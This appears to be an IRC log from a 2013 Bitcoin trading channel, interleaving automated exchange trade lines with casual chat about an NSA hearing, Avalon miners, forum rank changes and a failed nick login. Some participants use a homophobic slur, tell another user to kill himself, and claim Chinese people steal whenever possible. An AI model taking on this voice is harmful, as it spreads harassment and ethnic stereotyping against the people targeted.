= 0.0867 BTC [+] Jun 18 20:55:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.0289 = 0.0578 BTC [+] Jun 18 21:01:32 [HAVELOCK] [ASICM] 100 @ 0.02889 = 2.889 BTC [-] Jun 18 21:05:47 [BTCTC] [BTC-TRADING-PT] 1 @ 0.385 BTC [+] Jun 18 21:06:43 [BTCTC] [BTC-TRADING-PT] 2 @ 0.3896 = 0.7792 BTC [+] Jun 18 21:07:59 [HAVELOCK] [ASICM] 70 @ 0.02889 = 2.0223 BTC [-] Jun 18 21:09:25 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Jun 18 21:10:17 [HAVELOCK] [ASICM] 25 @ 0.02889 = 0.7223 BTC [-] Jun 18 21:11:20 [BTCTC] [PAJKA.BOND] 10 @ 0.06 = 0.6 BTC [-] Jun 18 21:11:48 ;;bc,stats Jun 18 21:11:50 Current Blocks: 242194 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1741 blocks | Next Difficulty In About: 1 week, 4 days, 16 hours, 25 minutes, and 46 seconds | Next Difficulty Estimate: 19934997.4718 | Estimated Percent Change: 3.08047 Jun 18 21:13:38 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Jun 18 21:20:55 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [-] Jun 18 21:26:22 [BTCTC] [ASICMINER-PT] 6 @ 2.865 = 17.19 BTC [+] Jun 18 21:33:02 [BTCTC] [DMS.SELLING] 1 @ 0.0338 BTC [+] Jun 18 21:34:49 [BTCTC] [ASICMINER-PT] 2 @ 2.865 = 5.73 BTC [+] Jun 18 21:36:40 [BTCTC] [ASICMINER-PT] 1 @ 2.865 BTC [+] Jun 18 21:38:26 ;;ticker Jun 18 21:38:26 BTCUSD ticker | Best bid: 107.33001, Best ask: 107.99899, Bid-ask spread: 0.66898, Last trade: 107.99899, 24 hour volume: 53887.30182094, 24 hour low: 100.01100, 24 hour high: 113.30000, 24 hour vwap: 107.30244 Jun 18 21:38:30 [BTCTC] [TAT.ASICMINER] 59 @ 0.02888 = 1.7039 BTC [-] Jun 18 21:38:58 [BTCTC] [TAT.ASICMINER] 33 @ 0.02888 = 0.953 BTC [-] Jun 18 21:39:24 [BTCTC] [ASICMINER-PT] 1 @ 2.865 BTC [+] Jun 18 21:39:42 The buffalo wings were a success btw Jun 18 21:39:49 not perfect, but pretty damn good Jun 18 21:40:26 used a bit too much salt, and hemp milk was a little too sweet to use as a milk substitute Jun 18 21:40:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.028895 BTC [+] Jun 18 21:43:40 [HAVELOCK] [ASICM] 5 @ 0.02880001 = 0.144 BTC [-] Jun 18 21:44:38 [BTCTC] [ASICMINER-PT] 4 @ 2.8 = 11.2 BTC [-] Jun 18 21:47:27 [HAVELOCK] [ASICM] 54 @ 0.02880001 = 1.5552 BTC [-] Jun 18 21:50:59 [BTCTC] [CRYPTO-TRADE] 15 @ 0.193 = 2.895 BTC [+] Jun 18 21:51:33 [BTCTC] [CRYPTO-TRADE] 3 @ 0.193001 = 0.579 BTC [+] Jun 18 21:55:13 [MPEX] [S.MPOE] 9300 @ 0.00067214 = 6.2509 BTC [-] Jun 18 22:05:14 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.006689 = 0.0468 BTC [-] Jun 18 22:06:29 [HAVELOCK] [ASICM] 1 @ 0.02880001 BTC [-] Jun 18 22:06:36 [HAVELOCK] [ASICM] 40 @ 0.02880001 = 1.152 BTC [-] Jun 18 22:07:15 [MPEX] [S.MPOE] 7500 @ 0.00067542 = 5.0657 BTC [+] Jun 18 22:07:17 [MPEX] [S.MPOE] 50 @ 0.00067594 = 0.0338 BTC [+] Jun 18 22:07:35 [HAVELOCK] [ASICM] 60 @ 0.02889 = 1.7334 BTC [+] Jun 18 22:07:37 [HAVELOCK] [ASICM] 1 @ 0.02889 BTC [+] Jun 18 22:10:42 [HAVELOCK] [ASICM] 100 @ 0.02880001 = 2.88 BTC [-] Jun 18 22:10:43 [HAVELOCK] [ASICM] 23 @ 0.0288 = 0.6624 BTC [-] Jun 18 22:11:54 [BTCTC] [S.DICE-PT] 7 @ 0.002501 = 0.0175 BTC [-] Jun 18 22:12:27 [02:40:27] used a bit too much salt, and hemp milk was a little too sweet to use as a milk substitute Jun 18 22:12:35 because you dont put milk in buffalo wings ;) Jun 18 22:12:49 ThickAsThieves: btw, in my sauce, Im toning down the pepper Jun 18 22:12:50 its just too much Jun 18 22:13:13 [BTCTC] [GSDPT] 1 @ 0.00225 BTC [-] Jun 18 22:13:49 [BTCTC] [BASIC-MINING] 1 @ 0.699 BTC [+] Jun 18 22:14:23 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.006689 = 0.0201 BTC [-] Jun 18 22:17:33 [BTCTC] [ASICMINER-PT] 1 @ 2.8699 BTC [+] Jun 18 22:17:47 [BTCTC] [ASICMINER-PT] 2 @ 2.87 = 5.74 BTC [+] Jun 18 22:17:49 [BTCTC] [ASICMINER-PT] 1 @ 2.877 BTC [+] Jun 18 22:17:51 [BTCTC] [ASICMINER-PT] 5 @ 2.879 = 14.395 BTC [+] Jun 18 22:17:54 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [+] Jun 18 22:22:25 -JonathanD- Hey Freenode, Fosscon is coming up Saturday August 10th. Fosscon has it's roots right here on freenode, and has been growing for 4 years now. Check it out over at http://fosscon.org, and check out a few of the speakers for this year at http://fosscon.org/speakers Jun 18 22:23:02 hey johnathanD, it's its not it's when you do the possessive. Jun 18 22:32:06 hey mircea_popescu Jun 18 22:32:16 how do you pronounce mircea? Jun 18 22:32:24 mer CHUH? Jun 18 22:32:27 mirˈt͡ʃe̯a Jun 18 22:32:33 mir - so? Jun 18 22:33:58 [BTCTC] [ASICMINER-PT] 1 @ 2.8432 BTC [-] Jun 18 22:34:00 [BTCTC] [ASICMINER-PT] 1 @ 2.843011 BTC [-] Jun 18 22:34:01 [BTCTC] [ASICMINER-PT] 1 @ 2.84301 BTC [-] Jun 18 22:34:03 [BTCTC] [ASICMINER-PT] 1 @ 2.8401 BTC [-] Jun 18 22:34:04 were those international characters, mircea_popescu ? came up as mir???a Jun 18 22:34:06 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [-] Jun 18 22:34:09 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Jun 18 22:34:11 [BTCTC] [ASICMINER-PT] 2 @ 2.827501 = 5.655 BTC [-] Jun 18 22:34:15 UTF-8 tho, should show up, right? Jun 18 22:34:35 meh, you need ipa support Jun 18 22:34:55 [BTCTC] [TAT.ASICMINER] 50 @ 0.028201 = 1.4101 BTC [-] Jun 18 22:34:58 [BTCTC] [TAT.ASICMINER] 47 @ 0.0282 = 1.3254 BTC [-] Jun 18 22:35:07 too lazy, mir-so is my pronunciation interpretation. Jun 18 22:35:10 :) Jun 18 22:35:20 the t͡ʃ bit is a postalveolar africate Jun 18 22:35:23 that you don't has in english. Jun 18 22:35:43 i can haz postalveolar africate Jun 18 22:35:45 ? Jun 18 22:36:02 lol Jun 18 22:36:10 sounds pretty simmilar to the tch in bitch Jun 18 22:36:23 http://en.wikipedia.org/wiki/Voiceless_palato-alveolar_affricate Jun 18 22:36:26 has a sound byte Jun 18 22:37:10 [BTCTC] [DMS.MINING] 2 @ 0.019989 = 0.04 BTC [+] Jun 18 22:37:20 [BTCTC] [DMS.MINING] 55 @ 0.019989 = 1.0994 BTC [+] Jun 18 22:37:25 let's be honest, this Texan couldn't pronounce it if his life depended on it. Jun 18 22:37:25 [BTCTC] [DMS.MINING] 288 @ 0.01999 = 5.7571 BTC [+] Jun 18 22:38:02 ya, it's the handlebar moustache Jun 18 22:38:36 [HAVELOCK] [ASICM] 3 @ 0.02889 = 0.0867 BTC [+] Jun 18 22:41:37 [BTCTC] [DMS.MINING] 12 @ 0.020249 = 0.243 BTC [+] Jun 18 22:41:42 [BTCTC] [DMS.MINING] 75 @ 0.02025 = 1.5188 BTC [+] Jun 18 22:42:19 so is it like saying "my chair" in Boston? muh CHAY uh ? Jun 18 22:42:37 mer CHAY uh Jun 18 22:42:42 ? Jun 18 22:43:03 [MPEX] [S.MPOE] 15600 @ 0.00067543 = 10.5367 BTC [-] Jun 18 22:43:20 mer CHAY uh POP a shoe Jun 18 22:43:51 or mer CHAY uh pop A show Jun 18 22:43:55 shoe* Jun 18 22:44:20 [BTCTC] [DMS.PURCHASE] 105 @ 0.054589 = 5.7318 BTC [-] Jun 18 22:44:30 just put up a damn mp3 of your slaves chanting it plz Jun 18 22:45:06 everything bitcoin is srs Jun 18 22:45:16 without srs there's no drama Jun 18 22:45:23 without drama there's no bitcoin Jun 18 22:45:35 [BTCTC] [ASICMINER-PT] 1 @ 2.8301 BTC [+] Jun 18 22:45:36 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Jun 18 22:45:38 [BTCTC] [ASICMINER-PT] 1 @ 2.828 BTC [-] Jun 18 22:45:42 [BTCTC] [ASICMINER-PT] 2 @ 2.8275 = 5.655 BTC [-] Jun 18 22:45:45 [BTCTC] [ASICMINER-PT] 5 @ 2.82601 = 14.1301 BTC [-] Jun 18 22:47:07 [BTCTC] [TAT.ASICMINER] 14 @ 0.0282 = 0.3948 BTC [-] Jun 18 22:48:22 this being kinda why everyone i nthe states just called me mr m Jun 18 22:48:31 well... this and the fact tarantino was popular at the time. Jun 18 22:49:53 ThickAsThieves i'll do better than that. here's mp3 of my slaves singing possibly the most obscene piece of romanian. (i wrote it) : http://trilema.com/2011/sfinta-inocenta-puberala/ Jun 18 22:52:03 [BTCTC] [DMS.PURCHASE] 61 @ 0.054589 = 3.3299 BTC [-] Jun 18 22:54:05 but your name is nowhere in that song Jun 18 22:54:49 well yeah. Jun 18 22:57:11 perhaps serious: http://bitcoin.stackexchange.com/questions/11695/traditional-vc-investment-vs-bitcoin-ipo Jun 18 22:57:14 [MPEX] [S.MPOE] 12850 @ 0.00067214 = 8.637 BTC [-] Jun 18 22:57:16 [MPEX] [S.MPOE] 9099 @ 0.00067092 = 6.1047 BTC [-] Jun 18 22:57:59 [BTCTC] [ASICMINER-PT] 1 @ 2.8719 BTC [+] Jun 18 22:58:09 perhaps homework not done. Jun 18 22:58:26 http://torwars.com/wp-content/uploads/2013/01/LeiaWTF.jpg pic related Jun 18 23:00:39 i'm not sure such homework can be done easily... perhaps they need a consultant? *evil grin* Jun 18 23:01:51 exactly. Jun 18 23:02:03 in dollar finance such homework can be done just as in bitcoin such homework can be done Jun 18 23:02:09 1. comprehend you need to do homework Jun 18 23:02:13 2. comprehend it's a skill Jun 18 23:02:17 3. hire someone to do it. Jun 18 23:02:50 all this citizen dentistry is starting to give everyone broken jaws. Jun 18 23:05:54 citizen dentistry eh Jun 18 23:06:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.028884 = 0.2888 BTC [+] Jun 18 23:06:08 i think it is a control thing. Jun 18 23:06:29 [BTCTC] [DMS.MINING] 1 @ 0.020277 BTC [+] Jun 18 23:06:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.028884 = 0.1155 BTC [+] Jun 18 23:07:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.028884 = 0.1733 BTC [+] Jun 18 23:08:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.028884 = 0.1155 BTC [+] Jun 18 23:08:21 [BTCTC] [TAT.ASICMINER] 43 @ 0.028885 = 1.2421 BTC [+] Jun 18 23:11:55 [BTCTC] [BITVPS] 2 @ 0.000786 = 0.0016 BTC [+] Jun 18 23:13:24 prolly. Jun 18 23:13:40 http://www.c-spanvideo.org/event/220343 Jun 18 23:13:51 to the senate! Jun 18 23:14:49 [BTCTC] [TAT.ASICMINER] 8 @ 0.028894 = 0.2312 BTC [+] Jun 18 23:15:24 [BTCTC] [CRYPTO-TRADE] 15 @ 0.194929 = 2.9239 BTC [+] Jun 18 23:15:28 [BTCTC] [CRYPTO-TRADE] 8 @ 0.19493 = 1.5594 BTC [+] Jun 18 23:15:29 [BTCTC] [CRYPTO-TRADE] 9 @ 0.19495 = 1.7546 BTC [+] Jun 18 23:15:31 [BTCTC] [CRYPTO-TRADE] 5 @ 0.195 = 0.975 BTC [+] Jun 18 23:15:35 candy crush saga gonna IPO Jun 18 23:15:51 link ? Jun 18 23:16:01 http://online.wsj.com/article_email/SB10001424127887323566804578553292301803254-lMyQjAxMTAzMDEwODExNDgyWj.html Jun 18 23:16:47 curious how that'll work out Jun 18 23:17:00 probably follow the same zynga trend Jun 18 23:17:06 http://www.theonion.com/articles/obama-administration-releases-nations-phone-record,32712/ Jun 18 23:17:06 up, up. then down Jun 18 23:17:11 when it is popular anymore Jun 18 23:17:12 [BTCTC] [TAT.ASICMINER] 25 @ 0.028884 = 0.7221 BTC [-] Jun 18 23:17:16 *isn't Jun 18 23:17:45 everyone plays that game. if they can monetize 1% it's probably profitable Jun 18 23:17:58 mebbe Jun 18 23:18:02 i never heard of it myself. Jun 18 23:18:08 americans have Jun 18 23:18:12 facebookians have Jun 18 23:18:29 [BTCTC] [DMS.MINING] 8 @ 0.0202 = 0.1616 BTC [-] Jun 18 23:18:31 [BTCTC] [BITVPS] 1 @ 0.000786 BTC [+] Jun 18 23:20:08 [BTCTC] [CRYPTO-TRADE] 2 @ 0.19895 = 0.3979 BTC [+] Jun 18 23:20:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006689 BTC [-] Jun 18 23:20:20 [HAVELOCK] [ASICM] 112 @ 0.02875 = 3.22 BTC [-] Jun 18 23:20:21 [HAVELOCK] [ASICM] 1 @ 0.0287 BTC [-] Jun 18 23:20:22 [HAVELOCK] [ASICM] 12 @ 0.0285 = 0.342 BTC [-] Jun 18 23:20:24 [HAVELOCK] [ASICM] 10 @ 0.0285 = 0.285 BTC [-] Jun 18 23:20:24 [HAVELOCK] [ASICM] 10 @ 0.0285 = 0.285 BTC [-] Jun 18 23:20:25 [HAVELOCK] [ASICM] 157 @ 0.0285 = 4.4745 BTC [-] Jun 18 23:20:26 [HAVELOCK] [ASICM] 648 @ 0.0285 = 18.468 BTC [-] Jun 18 23:21:05 so this video so far is "You make it sound like we are bad. We are not." Jun 18 23:21:19 huh ? Jun 18 23:21:28 http://www.c-spanvideo.org/event/220343 Jun 18 23:21:32 o o Jun 18 23:21:34 HEAD OF NSA MEETS WITH HSE. INTEL CMTE. Jun 18 23:23:13 he says that we can't go back to pre-9/11 ways Jun 18 23:23:19 spying required now Jun 18 23:23:24 lol k Jun 18 23:23:47 he's not evil, he just likes to fuck things up and won't give it up. Jun 18 23:25:56 Avalon responds: https://bitcointalk.org/index.php?topic=236348.msg2512830#msg2512830 Jun 18 23:27:42 [BTCTC] [DMS.MINING] 13 @ 0.0202 = 0.2626 BTC [-] Jun 18 23:27:44 [BTCTC] [DMS.MINING] 10 @ 0.020275 = 0.2028 BTC [+] Jun 18 23:27:46 [BTCTC] [DMS.MINING] 30 @ 0.020276 = 0.6083 BTC [+] Jun 18 23:27:50 [BTCTC] [DMS.MINING] 10 @ 0.020276 = 0.2028 BTC [+] Jun 18 23:28:22 [BTCTC] [DMS.PURCHASE] 12 @ 0.054589 = 0.6551 BTC [-] Jun 18 23:29:36 it's terrible Jun 18 23:29:40 they aren't saying anything Jun 18 23:29:56 right, i was gonna say, i don't understand what he's trying to say ? Jun 18 23:30:07 NSA or Avalon? Jun 18 23:30:09 he's dancing around the question and citing statue Jun 18 23:30:13 NSA Jun 18 23:30:13 i mean other than "ppl can't maff", which i guess he stole from my girl Jun 18 23:30:24 o no i meant avalon Jun 18 23:30:26 lol Jun 18 23:30:34 Avalon would have fucktons of bitcoins Jun 18 23:30:37 not just 700 Jun 18 23:30:42 i think that's what he meant Jun 18 23:30:45 why would they use 1 wallet Jun 18 23:30:47 how am i supposed to know they "only" have 700 ? Jun 18 23:30:50 exactly. Jun 18 23:31:03 the reddit/btctalk conspiracy is over 700 bitcoins Jun 18 23:31:03 that you're caught with a dead girl in the bed doth not mean you can't be a serial killed Jun 18 23:31:07 "because yu'd have dozens of them" Jun 18 23:31:16 lol Jun 18 23:31:32 batch one avalons mined 7+ coins on day one Jun 18 23:31:39 1 unit Jun 18 23:33:01 reasonable suspicion that you can articulate Jun 18 23:33:09 in order to wiretap Jun 18 23:33:14 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 18 23:33:17 he keeps using the world articulate Jun 18 23:33:25 in terms of preasonable suspicion Jun 18 23:34:11 your phone records and metadata is not private according to statute Jun 18 23:34:16 [BTCTC] [TAT.ASICMINER] 7 @ 0.028893 = 0.2023 BTC [+] Jun 18 23:35:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.028893 = 0.2889 BTC [+] Jun 18 23:35:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] Jun 18 23:35:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.028893 = 0.1156 BTC [+] Jun 18 23:42:34 [HAVELOCK] [ASICM] 54 @ 0.0285 = 1.539 BTC [-] Jun 18 23:42:43 [HAVELOCK] [ASICM] 29 @ 0.02841 = 0.8239 BTC [-] Jun 18 23:42:51 [HAVELOCK] [ASICM] 146 @ 0.028401 = 4.1465 BTC [-] Jun 18 23:42:58 [HAVELOCK] [ASICM] 200 @ 0.0284 = 5.68 BTC [-] Jun 18 23:43:08 [HAVELOCK] [ASICM] 8 @ 0.02831812 = 0.2265 BTC [-] Jun 18 23:43:13 [HAVELOCK] [ASICM] 4 @ 0.02831 = 0.1132 BTC [-] Jun 18 23:43:22 [HAVELOCK] [ASICM] 106 @ 0.02823398 = 2.9928 BTC [-] Jun 18 23:43:32 [HAVELOCK] [ASICM] 86 @ 0.0282 = 2.4252 BTC [-] Jun 18 23:49:57 amerifags still banging on about this NSA shit Jun 18 23:50:23 dub: yes Jun 18 23:50:24 thankfully Jun 18 23:52:04 5. complains will just lead into refunds, since clearly people are not happy with Avalon ASIC. Jun 18 23:52:20 BFL tactics Jun 18 23:52:51 we already mined the shit out of your unit, we'll gladly refund you and leave it in the farm Jun 18 23:53:08 He just confirmed that units have been burned-in for 24 hours. Was this done on the testnet or the real network? Jun 18 23:53:14 real Jun 18 23:53:21 thats a quote Jun 18 23:53:25 and who fucking cares Jun 18 23:53:39 the mob Jun 18 23:53:47 and their pitchforks Jun 18 23:53:48 why the fuck would they use testnet and what kind of butthurt fuckwit would care Jun 18 23:54:10 i think the issue is that it's still pretty likely theyve been mining with these for weeks Jun 18 23:54:13 not 1 day Jun 18 23:54:20 of course they have Jun 18 23:54:23 they are chinese Jun 18 23:54:39 if there is a way for them to steal shit they will, this is universally true and obvious Jun 18 23:55:03 [BTCTC] [ASICMINER-PT] 4 @ 2.81 = 11.24 BTC [+] Jun 18 23:55:20 the universe of china Jun 18 23:57:46 its like the NSA shit Jun 18 23:59:31 stuff america doesnt want to know Jun 19 00:00:26 because your world view extends to the back of the box your bigmac comes in Jun 19 00:00:49 [BTCTC] [ASICMINER-PT] 1 @ 2.849999 BTC [+] Jun 19 00:00:51 dont diss murica Jun 19 00:00:53 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Jun 19 00:00:55 [BTCTC] [ASICMINER-PT] 1 @ 2.859 BTC [+] Jun 19 00:02:25 omg chinese culture has no concept of fairness or equity, what do I do? Jun 19 00:02:38 of course it does. Jun 19 00:02:40 complain to dub! Jun 19 00:02:53 https://bitcointalk.org/index.php?topic=237597.0 Themos puttin that coin to good use Jun 19 00:02:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.02854 BTC [-] Jun 19 00:02:55 :/ Jun 19 00:02:55 it just doesn't happen to include dumb white people that don't speak the language. Jun 19 00:03:21 omg the govt has been openly spying on everything for ever, what do I do now that cnn is reporting it? Jun 19 00:03:23 [BTCTC] [ASICMINER-PT] 1 @ 2.8699 BTC [+] Jun 19 00:03:25 [BTCTC] [ASICMINER-PT] 2 @ 2.869999 = 5.74 BTC [+] Jun 19 00:03:26 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [+] Jun 19 00:03:27 [BTCTC] [ASICMINER-PT] 2 @ 2.871795 = 5.7436 BTC [+] Jun 19 00:03:29 [BTCTC] [ASICMINER-PT] 1 @ 2.871798 BTC [+] Jun 19 00:03:30 [BTCTC] [ASICMINER-PT] 1 @ 2.871798 BTC [+] Jun 19 00:03:32 [BTCTC] [ASICMINER-PT] 3 @ 2.8718 = 8.6154 BTC [+] Jun 19 00:03:42 mircea_popescu: they actually dont Jun 19 00:04:05 yeah they do. just try taking a chinese guy's stuff. Jun 19 00:04:16 he won't go "o well" Jun 19 00:04:16 Theymos took away my Hero-status with his new system :( Jun 19 00:04:21 sure he will Jun 19 00:04:25 just a ploy to get me to donate Jun 19 00:04:29 ThickAsThieves: heh Jun 19 00:04:36 he took away my mod status because I told the truth about bfl Jun 19 00:04:37 he's used to it, he'll just start over Jun 19 00:04:49 so theymos just cant be trusted Jun 19 00:05:02 derp Jun 19 00:05:10 I was part of the bitcoin community long before him, and I will be here long after him Jun 19 00:05:19 hes just another misguided fool Jun 19 00:06:04 omg theymos has always been a scumbag, now he took my mod, what do I do? Jun 19 00:06:06 i might actually donate now... sigh Jun 19 00:06:27 tbh, not being a bitcointalk mod raises your rep considerably Jun 19 00:06:45 dub: he did it awhile ago Jun 19 00:06:51 what dub said. Jun 19 00:06:59 I think what finally pissed him off was when I moved all the bfl threads to offtopic Jun 19 00:07:00 [BTCTC] [ASICMINER-PT] 1 @ 2.86 BTC [-] Jun 19 00:07:11 and left ONLY the official bfl thread Jun 19 00:07:30 i only want the 5 coin icns for "image" purposes, i think that was his real motivation Jun 19 00:07:34 icons* Jun 19 00:07:50 you know whats ironic? Jun 19 00:07:50 make people start donating again Jun 19 00:07:56 Im actually working on forum software for fun Jun 19 00:08:03 Im doing it as my "learn erlang" project Jun 19 00:08:19 heh and i got insta-upgraded to Sr.member Jun 19 00:08:45 i'm just Full now :( Jun 19 00:09:19 looks like my signature was seen and heard, i can now remove: text Let's reward bullshit by "Full" and "Hero" membership...what could possibly get wrong? Jun 19 00:10:06 lol Ummm...any reason why we've all just lost it??? I had 1000+ posts next to my name and was hero member an hour ago...now I have 70?! Jun 19 00:10:53 please kill yourself Jun 19 00:11:56 dub you just confirmed you posted them in outrage, so the quality was not sufficient for Sr/Hero membership Jun 19 00:12:27 I have never posted Jun 19 00:13:19 it should also show post count Jun 19 00:13:38 [BTCTC] [CRYPTO-TRADE] 10 @ 0.190001 = 1.9 BTC [-] Jun 19 00:13:48 If it showed ignored count I would be winning Jun 19 00:13:54 it shows both in profile Jun 19 00:14:14 [BTCTC] [ASICMINER-PT] 1 @ 2.8719 BTC [+] Jun 19 00:14:41 should show at side too i think Jun 19 00:14:50 i like being able to see em Jun 19 00:15:01 and yes, Ignore count would be nice Jun 19 00:15:09 [BTCTC] [TAT.ASICMINER] 23 @ 0.02854 = 0.6564 BTC [-] Jun 19 00:15:13 although the highlighting thing is okay i guess Jun 19 00:15:55 [BTCTC] [TAT.ASICMINER] 25 @ 0.02825 = 0.7063 BTC [-] Jun 19 00:15:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.028232 = 0.1129 BTC [-] Jun 19 00:16:55 I mean people you have ignored Jun 19 00:17:11 [BTCTC] [ASICMINER-PT] 3 @ 2.8719 = 8.6157 BTC [+] Jun 19 00:17:14 not sure how useful that is Jun 19 00:17:18 but sure Jun 19 00:17:22 while we're wishing Jun 19 00:18:53 its the thing im good at goddamit Jun 19 00:19:05 dub i doubt you'd get past the girl. Jun 19 00:19:33 as ingorer or ingoree Jun 19 00:19:48 she's a chamion ingoree for sure Jun 19 00:19:59 champion too Jun 19 00:20:29 ignorance is bliss Jun 19 00:20:45 see what i did there? Jun 19 00:20:51 ignor-ance Jun 19 00:20:55 meh Jun 19 00:21:34 [BTCTC] [ASICMINER-PT] 1 @ 2.8699 BTC [-] Jun 19 00:24:39 [BTCTC] [DMS.MINING] 1 @ 0.020277 BTC [+] Jun 19 00:24:50 http://www.myinstants.com/instant/tumbleweed/ Jun 19 00:25:04 [MPEX] [S.MPOE] 13100 @ 0.00067513 = 8.8442 BTC [+] Jun 19 00:25:06 [MPEX] [S.MPOE] 11550 @ 0.00067594 = 7.8071 BTC [+] Jun 19 00:25:22 [MPEX] [S.MPOE] 3621 @ 0.00067603 = 2.4479 BTC [+] Jun 19 00:29:40 [HAVELOCK] [ASICM] 6 @ 0.02889 = 0.1733 BTC [+] Jun 19 00:47:05 [HAVELOCK] [ASICM] 1 @ 0.02820001 BTC [-] Jun 19 00:48:11 [HAVELOCK] [ASICM] 24 @ 0.0282 = 0.6768 BTC [-] Jun 19 00:48:45 [HAVELOCK] [ASICM] 7 @ 0.02820001 = 0.1974 BTC [+] Jun 19 00:48:48 shouldt it be championne ? Jun 19 00:48:59 mebbe champignonne. Jun 19 00:49:04 cool, i'll pass this along. Jun 19 00:49:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.0283 = 0.1132 BTC [+] Jun 19 00:49:28 [HAVELOCK] [ASICM] 10 @ 0.02820001 = 0.282 BTC [+] Jun 19 00:50:09 [HAVELOCK] [ASICM] 7 @ 0.02820001 = 0.1974 BTC [+] Jun 19 00:52:05 [BTCTC] [ASICMINER-PT] 1 @ 2.8256 BTC [-] Jun 19 00:52:49 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [+] Jun 19 00:54:12 [BTCTC] [TAT.ASICMINER] 80 @ 0.02838 = 2.2704 BTC [+] Jun 19 00:54:13 [BTCTC] [TAT.ASICMINER] 79 @ 0.02839 = 2.2428 BTC [+] Jun 19 00:54:25 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Jun 19 00:56:13 [BTCTC] [TAT.ASICMINER] 18 @ 0.02839 = 0.511 BTC [+] Jun 19 00:57:45 [BTCTC] [ASICMINER-PT] 1 @ 2.8689 BTC [+] Jun 19 00:57:47 [BTCTC] [ASICMINER-PT] 1 @ 2.869 BTC [+] Jun 19 00:57:49 [BTCTC] [ASICMINER-PT] 1 @ 2.8699 BTC [+] Jun 19 01:08:02 [BTCTC] [DMS.MINING] 50 @ 0.02 = 1 BTC [-] Jun 19 01:10:24 [BTCTC] [COGNITIVE] 1 @ 0.315501 BTC [-] Jun 19 01:10:26 [BTCTC] [COGNITIVE] 4 @ 0.3155 = 1.262 BTC [-] Jun 19 01:10:28 [BTCTC] [COGNITIVE] 4 @ 0.310001 = 1.24 BTC [-] Jun 19 01:10:31 [BTCTC] [COGNITIVE] 5 @ 0.31 = 1.55 BTC [-] Jun 19 01:10:34 [BTCTC] [COGNITIVE] 1 @ 0.303 BTC [-] Jun 19 01:10:36 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [-] Jun 19 01:10:38 [BTCTC] [COGNITIVE] 1 @ 0.2944 BTC [-] Jun 19 01:10:39 [BTCTC] [COGNITIVE] 3 @ 0.285 = 0.855 BTC [-] Jun 19 01:13:12 [HAVELOCK] [ASICM] 25 @ 0.028889 = 0.7222 BTC [+] Jun 19 01:14:27 [HAVELOCK] [ASICM] 2 @ 0.028889 = 0.0578 BTC [+] Jun 19 01:18:08 [BTCTC] [ASICMINER-PT] 2 @ 2.871 = 5.742 BTC [+] Jun 19 01:23:08 [HAVELOCK] [HIM] 10 @ 0.28811 = 2.8811 BTC [-] Jun 19 01:24:23 [HAVELOCK] [KCIM] 1 @ 1.105 BTC [-] Jun 19 01:25:07 [HAVELOCK] [VTX] 1 @ 0.48011 BTC [-] Jun 19 01:26:17 [BTCTC] [ASICMINER-PT] 3 @ 2.871 = 8.613 BTC [+] Jun 19 01:28:05 [HAVELOCK] [KCIM] 1 @ 1.01211 BTC [-] Jun 19 01:29:08 [BTCTC] [RSM] 1 @ 0.015201 BTC [-] Jun 19 01:29:40 [BTCTC] [DMS.SELLING] 10 @ 0.035 = 0.35 BTC [+] Jun 19 01:30:44 [BTCTC] [ASICMINER-PT] 1 @ 2.871 BTC [+] Jun 19 01:33:19 btw anyone recognise: Nova_Kidd [6c36777c@gateway/web/freenode/ip.108.54.119.124 Jun 19 01:33:52 leet haxaur tried to jack my nick Jun 19 01:34:41 isnt your nick registered with nickserv? Jun 19 01:34:53 yus Jun 19 01:35:40 and it uses a usefully long and complex password? Jun 19 01:36:02 because otherwise I have no clue what you meant by "jack your nick" Jun 19 01:36:35 2[15:35] -NickServ(NickServ@services.)- Nova_Kidd!6c36777c@gateway/web/freenode/session failed to login to dub. Jun 19 01:37:00 so let him be a faggot Jun 19 01:37:18 if your password is usefully complex, he cant brute force it Jun 19 01:37:29 and enough failed attempts get you klined anyhow Jun 19 01:38:17 thanks for the skurity lesson bra Jun 19 01:38:32 password is at least as long as my dick so we're good Jun 19 01:38:47 thats a pretty short password then Jun 19 01:38:49 http://mcmangos.bandcamp.com/album/gangnam-access-memories Jun 19 01:39:40 daft punk are way overhyped Jun 19 01:39:53 new album is balls Jun 19 01:40:24 also french Jun 19 01:42:23 [HAVELOCK] [ASICM] 3 @ 0.0285 = 0.0855 BTC [-] Jun 19 01:42:31 [BTCTC] [ASICMINER-PT] 1 @ 2.871 BTC [+] Jun 19 01:43:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.028892 = 0.1156 BTC [+] Jun 19 01:43:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.028892 = 0.2889 BTC [+] Jun 19 01:45:36 til dub's pw is "mydick" Jun 19 01:45:39 6 chars. weak bro. Jun 19 01:46:17 [HAVELOCK] [ASICM] 4 @ 0.028889 = 0.1156 BTC [+] Jun 19 01:47:16 mircea_popescu: you lie :< Jun 19 01:47:33 